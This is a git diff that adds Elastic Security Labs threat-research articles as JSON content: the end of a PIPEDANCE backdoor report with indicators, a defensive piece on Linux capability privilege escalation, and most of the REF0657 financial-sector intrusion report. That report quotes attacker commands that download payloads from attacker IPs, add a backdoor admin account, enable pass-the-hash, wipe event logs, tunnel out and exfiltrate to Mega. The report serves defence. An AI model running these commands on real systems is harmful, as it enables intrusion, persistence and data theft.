movement](https://attack.mitre.org/tactics/TA0008/)\n- [Collection](https://attack.mitre.org/tactics/TA0009)\n- [Command and control](https://attack.mitre.org/tactics/TA0011/)\n- [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n\n### Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Gather victim network information](https://attack.mitre.org/techniques/T1590/)\n- [File and directory discovery](https://attack.mitre.org/techniques/T1083/)\n- [Process discovery](https://attack.mitre.org/techniques/T1057/)\n- [Process injection: thread execution hijacking](https://attack.mitre.org/techniques/T1055/003/)\n- [Token impersonation/theft](https://attack.mitre.org/techniques/T1134/001/)\n- [Lateral tool transfer](https://attack.mitre.org/techniques/T1570/)\n- [Internal proxy](https://attack.mitre.org/techniques/T1090/001/)\n- [Inter-Process communication](https://attack.mitre.org/techniques/T1559/)\n- [Application layer protocol](https://attack.mitre.org/techniques/T1071/)\n- [Obfuscated files or information](https://attack.mitre.org/techniques/T1027)\n- [Create or modify system process: Windows service](https://attack.mitre.org/techniques/T1543/003/)\n\n## Observables\n\nAll observables are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf10ee41eec4f6caf/63fcd87852820c02597c04f3/1326-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Indicator | Type | Reference |\n| ---------------------------------------------------------------- | ------- | ------------------------------- |\n| 9d3f739e35182992f1e3ade48b8999fb3a5049f48c14db20e38ee63eddc5a1e7 | SHA-256 | PIPEDANCE server-side component |\n| 805a4250ec1f6b99f1d5955283c05cd491e1aa378444a782f7bd7aaf6e1e6ce7 | SHA-256 | Cobalt Strike beacon |\n| exl.officeappsreviews[.]com/lanche-334e58sfj4eeu7h4dd3sss32d | URL | Cobalt Strike C2 server |\n"
+ },
+ "title": "Twice around the dance floor - Elastic discovers the PIPEDANCE backdoor",
+ "slug": "twice-around-the-dance-floor-with-pipedance",
+ "subtitle": "Elastic Security Labs describes the PIPEDANCE backdoor",
+ "date": "2023-02-27",
+ "description": "Elastic Security Labs is tracking an active intrusion into a Vietnamese organization using a recently discovered triggerable, multi-hop backdoor we are calling PIPEDANCE. This full-featured malware enables stealthy operations through the use of named",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "photo-edited-12@2x.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ref1326",
+ "pipedance"
+ ]
+ },
+ "id": "security_labs_content-twice_around_the_dance_floor_with_pipedance-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md.json
new file mode 100644
index 00000000000..393ab34e9ea
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unlocking Power Safely: Privilege Escalation via Linux Process Capabilities\"\nslug: \"unlocking-power-safely-privilege-escalation-via-linux-process-capabilities\"\nsubtitle: \"\"\ndate: \"2024-03-27\"\ndescription: \"Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities.\"\nauthor:\n - slug: shashank-k-s\nimage: \"Security Labs Images 36.jpg\"\ncategory:\n - slug: security-operations\ntags:\n - linux\n - privilege-escalation\n---\n\n## Preamble\n\nIn the realm of Linux security, administrators constantly grapple with a delicate balance between safeguarding sensitive system resources and accessibility. One helpful avenue that has garnered considerable attention in recent years is privilege escalation via Linux process capabilities. While traditional Unix-like permissions offer coarse-grained control over access rights, process capabilities provide a nuanced approach, allowing specific processes to wield elevated privileges without necessitating full root access.\n\nThis publication delves into the intricate world of privilege escalation through Linux process capabilities, unraveling its mechanisms, implications, and indispensable role in fortifying system security. Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities.\n\n## Linux Process Capabilities\n\nLinux process capabilities allow users to fine-tune the permissions and privileges of processes running on a Linux system. Traditionally, Linux used a simple binary approach to process permissions: either a process ran with full root privileges (superuser) or a regular user's limited privileges.\n\nHowever, this binary approach needed to be more flexible for security use cases, especially those requiring elevated privileges for only certain operations. To address this, Linux introduced capabilities that allow processes to have a subset of the privileges traditionally associated with the root user. These capabilities are managed using the “substitute user, do” (```sudo```) subsystem. By comparison, process capabilities provide a more granular way to grant specific privileges to processes. The ```sudo``` command allows users to temporarily escalate their privileges to execute administrative tasks as the superuser or another user.\n\nHere's how Linux process capabilities work:\n\n 1. **Role-based privileges**: In the traditional Unix security model, the superuser (root) has unrestricted access to all system resources and operations. Any process running with root privileges can perform any action on the system.\n\n 2. **Capability-based privileges**: With capabilities, specific privileges are split from the root user's authority and can be assigned to processes individually. This allows processes to be granted only the specific privileges they need to perform their tasks rather than granting them full root access. Capabilities can be assigned to individual executable files or running processes. When an executable file is launched, it can be configured to retain or drop certain capabilities. Similarly, capabilities can be added or removed from a running process using tools like `setcap` (to set file capabilities) or `capsh` (to create a capability shell wrapper).\n\n\n 3. **Capability groups**: Linux capabilities are divided into distinct types, each representing a different set of privileges. Some examples of capabilities include ```CAP_SYS_ADMIN``` (perform a range of system administration tasks), ```CAP_NET_ADMIN``` (configure network interfaces), and ```CAP_DAC_OVERRIDE``` (bypass file read/write permission checks). \n\n 4. **Effective and permitted capabilities**: Each process has two sets of capabilities—the effective and permitted sets. The effective set determines which capabilities the process can use at any given time, while the permitted set determines which capabilities it can gain via privilege escalation.\n\n 5. **Capability bounding set**: A bounding set of capabilities defines a ceiling on the capabilities a process can acquire, even through privilege escalation. This is a security feature to prevent unauthorized elevation of privileges.\n\nLinux process capabilities offer a more granular approach to managing privileges, enhancing security by reducing processes' attack surface while still allowing them to perform necessary tasks - of course, subject to operator error! They're particularly useful in scenarios where certain operations require elevated permissions, but granting full root access would be excessive and potentially risky.\n\n## Privilege Escalation via Linux process capabilities\n\nPrivilege escalation via Linux process capabilities involves exploiting misconfigurations or vulnerabilities to gain additional privileges beyond a process's intended purpose. While capabilities are meant to provide a more granular and secure approach to privilege management, they can still be misused or misconfigured, leading to potential security risks. This section will explore some ways privilege escalation via process capabilities can occur.\n\n 1. **Incorrectly set capabilities**: If an executable file has capabilities assigned to it that it doesn't need to perform its intended functions, an attacker could potentially exploit this by running the file to gain those extra privileges.\n - The risk: An attacker could exploit a misconfiguration where a binary has unnecessary set user identity (```setuid```) capabilities assigned to it. The attacker can access those capabilities by executing the binary, potentially escalating their privileges.\n - Example: Suppose a setuid binary ```/usr/bin/example_binary``` has the ```CAP_SYS_ADMIN``` capability set. An attacker could exploit this capability by executing the binary and gaining elevated privileges if it is unnecessary.\n\n 2. **Capability leaking**: Sometimes capabilities from its parent process. If a parent process has more capabilities than necessary and spawns a child process, the child process could inherit these capabilities, potentially giving it more privileges than intended.\n - The risk: If a privileged parent process spawns a child process without dropping unnecessary capabilities, it may inherit capabilities it doesn't require.\n - Example: A web server process runs with elevated privileges due to its requirements but spawns a child process to handle user requests. When a web server spawns child processes, it typically does so to handle incoming client requests efficiently. Each child process is responsible for servicing one or more client connections, allowing the web server to handle multiple requests concurrently. However, in certain scenarios, child processes spawned by a web server might inadvertently inherit unnecessary privileges or capabilities that the web server doesn't require. This can introduce security risks, as these child processes might have access to capabilities or resources beyond what is necessary to serve web requests. When a web server spawns child processes using a generic process creation mechanism without explicitly dropping unnecessary privileges or capabilities, these child processes might inherit the capabilities of the parent process. This could include capabilities such as creating raw network sockets, manipulating the firewall, or accessing sensitive files or system resources.\n\n 3. **Exploiting vulnerable setuid/setgid binaries**: Some ```setuid``` or ```setgid``` binaries may have capabilities assigned to them. If an attacker can abuse one of these binary misconfigurations, they may be able to execute arbitrary code with the elevated capabilities granted to the binary, leading to privilege escalation.\n - The risk: Exploiting vulnerabilities in setuid or setgid binaries with elevated capabilities can lead to privilege escalation.\n - Example: A vulnerable ```setuid``` binary, such as ```/bin/su```, may have a flaw that allows an attacker to execute arbitrary code with elevated capabilities, effectively escalating their privileges to root.\n\n 4. **Kernel vulnerabilities**: Since the Linux kernel enforces capabilities, vulnerabilities in the kernel could potentially be exploited to bypass capability checks and gain elevated privileges.\n - The risk: Vulnerabilities in the Linux kernel itself could be exploited to bypass capability checks and gain elevated privileges.\n - Example: Suppose a kernel vulnerability allows an attacker to manipulate capability checks. By exploiting this vulnerability, an attacker could bypass capability checks and gain access to capabilities they are not supposed to have.\n\n 5. **Capability bounding set misconfiguration**: If the capability bounding set is not properly configured, processes could gain additional capabilities through privilege escalation techniques..\n - The risk: An attacker could exploit the capability bounding set to gain additional capabilities through techniques such as using the ```ptrace``` system call to observe and control the execution of another process.\n - Example: An attacker could abuse a misconfigured capability bounding set to allow their malicious process to trace and control another process, effectively gaining its capabilities.\n\n 6. **Abusing file attributes**: Linux filesystems support extended attributes, including file capabilities. If an attacker gains control of a file with elevated capabilities, they may be able to execute the file and gain those capabilities, potentially leading to privilege escalation.\n - The risk: Exploiting extended attributes, including file capabilities, could allow an attacker to execute a file with elevated capabilities, leading to privilege escalation.\n - Example: An attacker could gain control of a file with elevated capabilities, such as ```CAP_NET_ADMIN```, and execute it to gain those capabilities, potentially escalating their privileges to perform network-related tasks beyond their intended scope.\n\n## Mitigating the risks of Privilege Escalation\n\nMitigating privilege escalation via process capabilities involves implementing several security best practices to reduce the risk of unauthorized access to elevated privileges. Here are some key practices to consider:\n\n 1. **Least Privilege Principle**: Follow the principle of least privilege by assigning only the necessary capabilities to processes and users. Limit capabilities to what is required for specific tasks, avoiding assigning unnecessary privileges.\n\n 2. **Regular Auditing and Review**: Conduct regular audits and reviews of the capabilities assigned to executable files, processes, and users. Ensure that capabilities are accurately assigned based on the principle of least privilege.\n\n 3. **Secure Configuration of Setuid/Setgid Binaries**: Review and restrict capabilities assigned to these binaries to prevent unauthorized privilege escalation.\n\n 4. **Capability Bounding Set Configuration**: Properly configure the capability bounding set to restrict the capabilities acquired through privilege escalation techniques such as ```ptrace```. Limit the capabilities available to processes, especially those with elevated privileges.\n\n 5. **Kernel and Software Updates**: The Linux kernel and all software components should be updated with the latest security patches. Updates should be applied regularly to mitigate potential vulnerabilities that could be exploited for privilege escalation.\n\n 6. **Security Hardening**: Implement security hardening measures to strengthen the system's overall security posture. This includes configuring and deploying security-enhancing mechanisms such as SELinux (Security-Enhanced Linux) or AppArmor to enforce mandatory access controls and confinement policies.\n\n 7. **Filesystem Integrity Checks**: Implement filesystem integrity checks to detect unauthorized changes to files, including those with extended attributes such as capabilities. \n\n 8. **Monitoring and Logging**: Implement robust monitoring and logging mechanisms to detect and track suspicious activities related to privilege escalation attempts. Monitor system logs, audit trails, and security events to identify unauthorized access attempts or unusual behavior.\n\nWith all these measures in place to mitigate the risks of privilege escalation via Linux process capabilities, leaks can make it to the infrastructure providing a window of opportunity to exploit and gain control. The next section describes how Elastic Security helps detect privilege escalation use cases for process capabilities.\n\n## Detect Privilege Escalation using Elastic Security \n\t\nIn [Elastic 8.11](https://www.elastic.co/blog/whats-new-elastic-security-8-11-0) new detection rules were added to detect discovery and privilege escalation of Linux process capabilities. Users can leverage these Elastic prebuilt rules by following the guidelines to [install and manage elastic prebuilt rules](https://www.elastic.co/guide/en/security/8.11/prebuilt-rules-management.html). To enable and organize these specific rules refer to the [manage detection rules](https://www.elastic.co/guide/en/security/8.11/rules-ui-management.html) guidelines. \n\nTo gain visibility around Linux Process Capabilities, users can also search from the below list for specific prebuilt rules to enable them:\n - [Process Capability Enumeration](https://www.elastic.co/guide/en/security/current/process-capability-enumeration.html)\n - [Potential Privilege Escalation via Linux DAC permissions](https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-linux-dac-permissions.html)\n - [Potential Privilege Escalation via Enlightenment](https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-enlightenment.html)\n - [Privilege Escalation via GDB CAP_SYS_PTRACE](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-gdb-cap-sys-ptrace.html)\n - [Root Network Connection via GDB CAP_SYS_PTRACE](https://www.elastic.co/guide/en/security/current/root-network-connection-via-gdb-cap-sys-ptrace.html)\n - [Privilege Escalation via CAP_CHOWN/CAP_FOWNER Capabilities](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-cap-chown-cap-fowner-capabilities.html)\n - [Privilege Escalation via CAP_SETUID/SETGID Capabilities](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-cap-setuid-setgid-capabilities.html)\n - Some Building Block Rules \n - [Network Traffic Capture via CAP_NET_RAW](https://www.elastic.co/guide/en/security/current/network-traffic-capture-via-cap-net-raw.html)\n - [CAP_SYS_ADMIN Assigned to Binary](https://www.elastic.co/guide/en/security/current/cap-sys-admin-assigned-to-binary.html)\n\n_Important Elastic Infrastructure Note_: Stack + Agent + Policy are all advised to be on 8.11+ for capturing Linux Process capabilities. Of the available Linux Process Thread capability sets, only the below two sets are captured on Elastic 8.11+ Elastic Infrastructure.\n - `CapPrm` (Permitted capabilities) are the capabilities that a process can have.\n - `CapEff` (Effective capabilities) set is all the capabilities with which the current process is executed.\n\n## Conclusion\n\nIn the realm of Linux security, understanding and effectively leveraging process capabilities for privilege escalation is paramount. By granting specific processes elevated privileges without resorting to full root access, this mechanism enhances the security posture of systems by limiting the potential impact of compromised processes. However, this power comes with greater responsibility; misconfigurations or misuse of process capabilities can introduce new avenues for exploitation.\n\nWe've uncovered the nuanced interplay between process capabilities and traditional permission models, such as sudo, highlighting their complementary roles in access control. As administrators, it's imperative to implement robust practices for managing and auditing process capabilities, ensuring that only trusted processes are granted the necessary privileges.\n\nFurthermore, as the Linux ecosystem continues to evolve, maintaining awareness of updates and best practices in process capability management is essential. Through vigilance, education, and the adoption of security-first principles, we can fortify our systems against emerging threats while maintaining the flexibility and functionality necessary for modern computing environments. \n\nWith Elastic Defend’s proactive approach to privilege escalation via Linux process capabilities, we can bolster the security foundations of our systems and safeguard against potential exploits in an ever-changing threat landscape.\n"
+ },
+ "title": "Unlocking Power Safely: Privilege Escalation via Linux Process Capabilities",
+ "slug": "unlocking-power-safely-privilege-escalation-via-linux-process-capabilities",
+ "subtitle": "",
+ "date": "2024-03-27",
+ "description": "Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities.",
+ "author": [
+ {
+ "slug": "shashank-k-s"
+ }
+ ],
+ "image": "Security Labs Images 36.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ }
+ ],
+ "tags": [
+ "linux",
+ "privilege-escalation"
+ ]
+ },
+ "id": "security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unmasking_financial_services_intrusion_ref0657-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unmasking_financial_services_intrusion_ref0657-md.json
new file mode 100644
index 00000000000..8bf5140a336
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unmasking_financial_services_intrusion_ref0657-md.json
@@ -0,0 +1,39 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unmasking a Financial Services Intrusion: REF0657\"\nslug: \"unmasking-financial-services-intrusion-ref0657\"\nsubtitle: \"Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.\"\ndate: \"2024-01-31\"\ndescription: \"Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.\"\nauthor:\n - slug: daniel-stepanic\n - slug: salim-bitam\n - slug: andrew-pease\nimage: \"photo-edited-08@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref0657\n - nps\n - cobalt strike\n - iox\n - rakshasa\n - supershell\n---\n\n## Preamble\n\nIn December of 2023, Elastic Security Labs detected a smash-and-grab style intrusion directed at a financial services organization in South Asia. Throughout the breach, a diverse set of open-source tools were employed within the victim's environment, some of which we encountered for the first time. The threat group engaged in different post-compromise activities: from discovery/enumeration to utilizing the victim's internal enterprise software against them and eventually leveraging different tunnelers and side-loading techniques to execute Cobalt Strike. In addition, the adversary used the file hosting service Mega to exfiltrate data from the network.\n\nBy disclosing the details of this intrusion set (REF0657) and the various tactics, techniques, and procedures (TTPs), we hope to assist fellow defenders and organizations in recognizing and monitoring this type of activity. \n\n### Key takeaways\n\n* REF0657 targeted financial services in South Asia\n* This group leveraged a broad range of post-compromise behaviors, including backdoor access using Microsoft SQL Server, dumping credentials, wiping event logs, and exfiltrating data using MEGA CMD\n* The activity included an assortment of network tunnelers and proxy tools as well as Cobalt Strike and ties to infrastructure using the C2 framework, Supershell\n\n## Campaign analysis \n\nOur team identified the initial enumeration happening in a customer environment on December 17, 2023. While we didn't have visibility around the root cause of the infection, we continued to monitor the environment. Over the next several weeks, we discovered seven different hosts, mainly servers, exhibiting a large swath of activity, including:\n\n* Discovery/enumeration\n* Downloading additional tools/components\n* Renaming and staging tools in legitimate folder locations in the environment\n* Dumping credentials from the registry and adding users to machines\n* Modifying the environment to enable lateral movement and persistence\n* Executing proxy tunnelers and shellcode to maintain access into the environment\n* Compressing and exfiltrating data using cloud services provider Mega\n* Wiping event logs on multiple machines \n\n## Execution Flow / Timeline\n\nA significant portion of the activity observed by our team came through command-line execution abusing Microsoft SQL Server (`sqlservr.exe`). While we couldn’t pinpoint the root cause, we have reason to believe the attacker gained access to the environment through this remotely accessible server and then started executing commands and running programs using the MSSQL’s stored procedure (`xp_cmdshell`). This initial endpoint served as the beachhead of the attack where all activity seemed to originate from here.\n\n### Discovery/Enumeration/Staging\n\nThe threat actor used several standard Windows utilities for initial discovery and enumeration. The following graphic shows the different commands spawned from the parent process (`sqlservr.exe`):\n\n\n\n\nOftentimes, the attacker checked to verify their payloads were running, reviewed network connections on victim machines, and performed directory listings to check on their different files.\n\nAfter initial access was gained, the actor tried several methods for downloading additional payloads and tooling. The adversary started to use `certutil.exe` and then moved to `bitsadmin.exe`, PowerShell’s `DownloadFile()` method, and eventually back to `certutil.exe`. These different tools interacted with IP addresses (`149.104.23[.]17` and `206.237.3[.]150`).\n\n\n\n\n### Lateral Movement + Persistence\n\nAs the actors moved in the environment, they leveraged remote SMB and WMI to create a local administrator account named \"helpdesk\" on each machine. In some cases, they set up a randomly named Windows service (`qLVAMxSGzP`) as a persistence mechanism. This service would execute a temporary batch file with commands to add a local user and insert this user into the local administrator group. After execution, the file would then be deleted. \n\n```\n%COMSPEC% /Q /c echo net user helpdesk P@ssw0rd /add && \\ \nnet localgroup administrators helpdesk /add \\ \n^> \\\\127.0.0.1\\C$\\FOUGTZ 2^>^&1 > %TEMP%\\VOruiL.bat & \\ \n%COMSPEC% /Q /c %TEMP%\\VOruiL.bat & %COMSPEC% /Q /c del %TEMP%\\VOruiL.bat\n```\n\n### Execution\n\nThe adversary moved to Cobalt Strike for C2 and further execution. This time, they used a legitimately signed version of Trend Micro’s Deep Security Monitor (`ds_monitor.exe`). This was used to load Cobalt Strike by side-loading a malicious DLL (`msvcp140.dll`). We observed the download of the DLL from a `certutil.exe` execution, and then we confirmed this behavior via call stack telemetry.\n\n```\n\"C:\\Windows\\system32\\cmd.exe\" /c certutil -urlcache -split -f \\ \nht\"\"\"\"tp://206.237.3[.]150:443/1.txt \\ \nC:\\users\\public\\downloads\\msvcp140.dll\n```\n\nThe screenshot below shows that the actor placed the TrendMicro application inside a directory labeled McAfee in ProgramData. We can see the malicious DLL being loaded from the same directory by checking the call stack.\n\n\n\n\nShortly after, Run Key persistence was added to execute (`ds_monitor.exe`) on system startup.\n\n```\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \\ \nTrendMicro /t REG_SZ /d \\ \n\"C:\\ProgramData\\McAfee\\TrendMicro\\ds_monitor.exe\" /f /reg:64\n```\n\nAn analysis on `msvcp140.dll` reveals that the threat actor tampered with the DllEntryPoint of the legit Windows DLL by substituting it with modified code sourced from a public [repository](https://github.com/ShadowMccc/MemoryEvasion) - this is a custom Cobalt Strike memory evasion loader.\n\n\n\n\nWhile the original code retrieved the Cobalt Strike beacon from memory, the altered version loads a beacon in base64 format from a file named `config.ini` that connects to `msedge[.]one`.\n\n### Dumping credentials\n\nOne of the main methods observed for gathering credentials was dumping the Security Account Manager (SAM) registry hive on different servers.\n\n\n\n\n### Network/Registry/Logging Modifications \n\nThe threat actor modified several different configurations and settings to help further increase their access to the environment. One of our first observations of this behavior was [enabling RDP](https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-localsessionmanager-fdenytsconnections) (set value to 0) through the registry at the following path (`HKLM\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections)`. Then, they disabled the Windows Firewall rules using the command:` NetSh Advfirewall set allprofiles state off`.\n\nAfterward, they enabled [Restricted Admin](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)#restricted-admin-mode-for-remote-desktop-connection) mode through a registry modification, this allowed the adversary to conduct pass-the-hash style attacks against Remote Desktop Protocol (RDP). \n\n```\ncmd.exe /Q /c REG ADD \"HKLM\\System\\CurrentControlSet\\Control\\Lsa\" \\ \n/v DisableRestrictedAdmin /t REG_DWORD /d 00000000 \\ \n/f 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\RExePi 2>&1\n```\n\nIn addition to these changes, the attacker also wiped the Windows event logs for System and Security notifications using the Windows Event Utility, `wevtutil.exe`:\n\n```\ncmd.exe /Q /c wevtutil.exe cl System 1> \\ \n\\\\127.0.0.1\\C$\\Windows\\Temp\\ksASGt 2>&1\n\ncmd.exe /Q /c wevtutil.exe cl Security 1> \\ \n\\\\127.0.0.1\\C$\\Windows\\Temp\\uhxJiw 2>&1\n```\n\n### Tunneling/Proxy Tools\n\nAfter a day of initial access, the adversary generated several shellcode injection alerts using `AppLaunch.exe` (a binary that manages and executes applications built with Microsoft's .NET Framework) and outputting the results to a file called `1.txt`. The command line argument associated with this alert is as follows: `c:\\programdata\\AppLaunch.exe proxy -r 206.237.0[.]49:12355 >> 1.txt`\n\nAfter examining the injected code, we identified the shellcode as a Golang binary known as `iox`, which can be compiled from the following publicly available [repository](https://github.com/EddieIvan01/iox). This tool is designed for port forwarding and proxying with additional features such as traffic encryption. Based on the observed command line, the attacker established a proxy connection to `206.237.0[.]49` on port `12355`.\n\nIntended or not, the proxy utility was launched by several different legitimate processes: `lsass.exe`, `vmtoolsd.exe`, and `mctray.exe`. In this case, the threat actor side-loaded a common malicious unsigned DLL (`mscoree.dll`) located in the `C:\\programdata\\` directory.\n\n\n\n\nThe actor employed another proxy known as [Rakshasa](https://github.com/Mob2003/rakshasa), downloaded directly from the tool's official GitHub page using the `certutil` command. It was stored in `c:\\users\\public\\downloads\\ra.exe`, and then executed with the following command:\n`C:\\Windows\\system32\\cmd.exe /C C:\\Users\\Public\\Downloads\\ra.exe -d 149.104.23[.]176:80`.\n\nThis command creates a proxy tunnel to the threat actor infrastructure, connecting to the IP address `149.104.23.176` on port `80`. If that wasn’t enough, the actor started to send and retrieve data from the network through ICMP tunneling. For example, when the actor executed the tasklist command, the output was saved to `C:\\programdata\\re.txt`, and exfiltrated through ICMP using PowerShell.\n\n\n\n\n### Exfiltration\n\nOne of the more noteworthy parts of this intrusion was centered around the adversary downloading [MEGA Cmd](https://mega.io/cmd), a command-line utility that works with the Mega file hosting service. While still leveraging MSSQL, they downloaded this program, renaming it to `ms_edge.exe`.\n\n```\n\"C:\\Windows\\system32\\cmd.exe\" /c certutil -urlcache -split -f \\ \nht\"\"\"\"tp://206.237.3.150:443/megacmd.exe \\ \nC:\\users\\public\\downloads\\ms_edge.exe\n```\n\nShortly after, we observed this utility being executed with an argument to a configuration file (called `tmp`) and a compressed file stored with a backup extension (`.bak`) being used in conjunction with Mega.\n\n```\nC:\\users\\public\\downloads\\ms_edge.exe --config \\ \nC:\\users\\public\\downloads\\tmp copy \\ \nREDACTED_FILENAME.bak mega_temp:\n```\n\n### Infrastructure\n\nThroughout this investigation, the threat group used several servers to host their payloads or forward network traffic. The Elastic Security Labs team discovered two web servers with open directories hosting files publicly reachable on: \n\n* `206.237.3[.]150`\n* `206.237.0[.]49` \n\n![Open directory at 206.237.3[.]150](/assets/images/unmasking-financial-services-intrusion-ref0657/image3.png \"Open directory at 206.237.3[.]150\")\n\n\nIn addition, our team observed [Supershell](https://github.com/tdragon6/Supershell/tree/main) panel, a Chinese-based C2 platform running on `206.237.[0].49:8888`.\n\n![Supershell Panel on 206.237.0[.]49](/assets/images/unmasking-financial-services-intrusion-ref0657/image1.png \"Supershell Panel on 206.237.0[.]49\")\n\n\nWe validated an earlier finding in the previous section when we found a configuration file (referred to as `tmp` in the Exfiltration section) used for automation with the Mega platform containing credentials used by the adversary. As well, there was a variety of web shell files and scripts originating from the following public repositories:\n\n* [https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md#abusing-ssrf-in-aws-ec2-environment](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md#abusing-ssrf-in-aws-ec2-environment)\n* [https://github.com/tutorial0/WebShell/blob/master/Aspx/ASPXspy.aspx](https://github.com/tutorial0/WebShell/blob/master/Aspx/ASPXspy.aspx)\n* [https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.ashx](https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.ashx)\n\nFurthermore, within these directories, we identified a few interesting binaries:\n\n**cloud_init**\n\nOne of the files (`cloud_init`) is a Golang ELF binary packed with UPX. After inspection, it was determined that it was compiled from the [NPS repository](https://github.com/ehang-io/nps/tree/master), another intranet proxy server compatible with most common protocols. The threat actor altered the code to encrypt the strings during compilation. The decryption process uses separate byte arrays where the bytes of one array are combined with the bytes of the other array, employing operations such as addition, XOR, or subtraction for the decryption.\n\n\n\n\n**MSASN1.dll**\n\nAfter review, this DLL matched the same functionality/code as the previously discussed file (`msvcp140.dll`).\n\n### REF0657 through MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n#### Tactics\n\nTactics represent the why of a technique or sub-technique. The adversary’s tactical goal is the reason for performing an action. The tactics observed in REF0657 were:\n\n* [Lateral Movement](https://attack.mitre.org/tactics/TA0008/)\n* [Persistence](https://attack.mitre.org/tactics/TA0003/)\n* [Execution](https://attack.mitre.org/tactics/TA0002/)\n* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n* [Discovery](https://attack.mitre.org/tactics/TA0007)\n* [Command and Control](https://attack.mitre.org/tactics/TA0011)\n* [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n\n#### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action. Elastic Security Labs observed the following techniques within REF0657:\n\n* [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)\n* [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)\n* [Masquerading](https://attack.mitre.org/techniques/T1036/)\n* [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/)\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)\n* [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)\n* [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/)\n\n## Summary\n\nIn summary, this intrusion highlighted some new tooling while re-emphasizing that not all intrusions are dictated by novel malware and techniques. These types of threats demonstrate the real-world challenges most organizations are faced with daily. \n\nThe threat group moved very quickly in this environment, where within almost 24 hours, meaningful data to the attacker was extracted from the network. Sharing some of these details can help defenders plug possible holes or gaps in coverage from some of these techniques.\n\n### The Diamond Model\n\nElastic Security Labs utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.\n\n\n\n\n## Detecting REF0657\n\nThe following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:\n\n### Detection\n\n* [Direct Outbound SMB Connection](https://www.elastic.co/guide/en/security/current/direct-outbound-smb-connection.html#direct-outbound-smb-connection)\n* [Execution via MSSQL xp_cmdshell Stored Procedure](https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp-cmdshell-stored-procedure.html)\n* [Execution via Renamed Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_execution_via_renamed_signed_binary_proxy.toml)\n* [Potential Remote Credential Access via Registry](https://www.elastic.co/guide/en/security/current/potential-remote-credential-access-via-registry.html)\n* [Process Execution from an Unusual Directory](https://www.elastic.co/guide/en/security/current/process-execution-from-an-unusual-directory.html)\n* [Suspicious CertUtil Commands](https://www.elastic.co/guide/en/security/current/suspicious-certutil-commands.html)\n* [WMI Incoming Lateral Movement](https://www.elastic.co/guide/en/security/current/wmi-incoming-lateral-movement.html)\n\n### Prevention\n\n* [Ingress Tool Transfer via INET Cache](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_ingress_tool_transfer_via_inet_cache.toml)\n* [Potential Masquerading as 